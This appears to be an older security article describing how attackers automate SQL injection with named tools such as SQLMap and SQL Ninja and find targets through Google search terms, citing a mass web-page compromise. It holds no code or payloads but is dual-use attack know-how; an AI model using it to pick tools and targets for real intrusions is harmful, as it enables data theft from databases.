SQL Injection through Automation with Tools
Tools are mainly used for automating two tasks within the SQL injection attack process: construction of a working exploit and extracting information. Having automated tools at hand not only dramatically increase the efficiency of an experienced hacker but also extends the potential attacker population. Software tools equipped with a crisp and appealing GUI, allow inexperienced “script kiddies” to mount complex SQL injection attacks against targets previously requiring in-depth knowledge of hacking techniques (e.g. blind SQL injection) and acquaintance with the backend database vendor technology (including structure of data dictionary, specific SQL strand, etc.). The overall effect of automation can be clearly depicted by looking at information regarding SQL incidents.
With the daunting, time-consuming task of creating a working exploit taken care of by automated tools the time frame between target discovery and full exploitation is greatly diminished. This has two favorable effects for potential attackers. First and foremost, the risk for detection is lower, as the attack duration shortens. This is as true in real life heists as it is for the cyberspace ones. Secondly, it is much easier for attackers to find a window of opportunity to launch their attack, even against systems that are carefully watched and not always available for remote exploit.
Not all tools are created alike. Some are targeted towards specific vendor brands; some perform only a single task while others are more comprehensive. Some are command-line tools while others have a lavish GUI. Generally speaking, there are now tools that provide the following capabilities:
» Given an injection point (URL and parameters), create a working exploit.
» Achieve the above goal even when blind SQL injection is required
» Identify type of backend database
» Extract metadata from backend database (list of tables, columns and users)
» Extract information through GUI
» Extract information through binary search
» Compromise remote server by deploying backdoors
These are some of the tools being employed by hackers to automate SQL injection attacks:
» Priamos can be used to find vulnerabilities in applications. The tool requires manual configuration of the injection point, but thereafter, the user can apply the vulnerable character string into the injector module in Priamos to retrieve all database names, tables and column data. It presents a GUI to the user for direct database interaction.
» Power Injector does some automatic detection of the injection point and provides a GUI to take the SQL injection attack further from that point in order to extract desired information from the database. Its power lies in its capacity to automate tedious blindfolded SQL injection methods with several threads.
» SQL Ninja can be used to exploit SQL injection vulnerabilities on a Web application that uses Microsoft SQL Server as its back-end database. It requires manual configuration of the injection point. It is dedicated to exploiting injections into a specific stored procedure of the database server called Xp_cmdshell.
» SQL Map does some of its automated detection of the injection point based on Google searches. It performs automatic blind SQL injection, capable of capturing an active database management system fingerprint, enumerating entire remote databases and much more.
These are just a few of the more common and publicized tools, but there are many more tools that have been and continue to be developed by professional attackers with the purpose of automating SQL injection attacks. An attacker with the appropriate toolbox and an idea about potential injection points in an application needs no more than click and point to get away with credit card numbers, social security numbers and other personal information stored in a backend database.
SQL Injection through Automation with Search Engines
While tools are mostly used for reducing the time from vulnerability detection to exploit, another type of automation is required for quickly detecting large quantities of potential targets. The growing trend is the increased abuse of Internet search engines for spotting potential SQL injection targets.
Using specially crafted search terms, an attacker can quickly get a list of applications, accessible through the Internet, that are potentially vulnerable to a specific instance of SQL injection. Search terms can be created to detect a specific vulnerable application (e.g. one that was identified as vulnerable by a CVE entry) or a specific error code indicative of SQL injection vulnerability. The results include not only a domain name for the target application but the actual injection points within that application. Thus, an attack can be quickly mounted by taking the information from the search engine results and feeding them to one of the automated tools mentioned above.
Attackers can craft their own search terms but can also use resources available on the Internet that provide lists of search terms for almost any type of attack, SQL injection included. One of the most famous resources in this respect is Johnny Long’s Google Hacking Database maintained at johnny.ihackstuff.com. The search terms on Johnny’s database, called “Google Dorks” are categorized by attack type and the interface to the database is very intuitive.
Further increasing the potential effect of the Google Hacking technique on improving the overall efficiency of an attack is the use of automated search tools. These simple robots take as input a list of search terms, run them all at once and give back a formatted set of results. Attackers can use their own tools (creating such a tool can be a really simple programming exercise) or use available tools from the Internet such as Goolag Scanner (by The Cult of the Dead Cow). This tool in particular takes its list of search terms from Johnny Long’s database and makes them available to the non-technical user through a pleasant, easy-to-use GUI.
Earlier this year, hackers used search engines to quickly find ASP and ASPX (.net) pages that accepted a set of carefully chosen input parameters (e.g.an article ID, product ID and others) which they suspected are indicative of a number of poorly written modules available worldwide (most probably code samples widely used by programmers). This served as the injection point for the successful upload of SQL injection code in over 500,000 Web pages. The code caused a user who visited the site to be redirected to a malware serving site. Affected companies were forced to quickly investigate and sanitize the Web sites by removing the injected code.